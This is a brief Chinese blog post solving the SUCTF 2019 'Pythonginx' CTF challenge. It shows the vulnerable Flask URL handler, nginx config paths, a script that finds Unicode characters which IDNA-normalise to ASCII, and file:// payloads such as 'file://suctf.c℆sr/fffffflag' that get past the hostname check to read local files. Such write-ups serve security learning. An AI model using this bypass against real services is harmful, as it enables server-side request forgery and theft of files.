[SUCTF 2019]Pythonginx

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
   
    <!-- Dont worry about the suctf.cc. Go on! -->
    <!-- Do you know the nginx? -->

 

nginx配置

配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf
ps: 现在nginx网站配置从nginx.conf转到同目录文件夹下的default.config

 

寻找可用字符:

# coding:utf-8 
for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if("-") in res:            
            continue        
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass

 

 根据题意可知,他的url很大可能是suctf.cc

加上提示的nginx找配置文件就能找到flag的路径

由此可以想到构造:file://suctf.c℆sr/local/nginx/conf/nginx.conf(另一种绕过方式是利用来代替c及进行绕过)

 

 最后构造payload:file://suctf.c℆sr/fffffflag

 

posted @ 2021-04-24 22:18  夜布多  阅读(129)  评论(0编辑  收藏  举报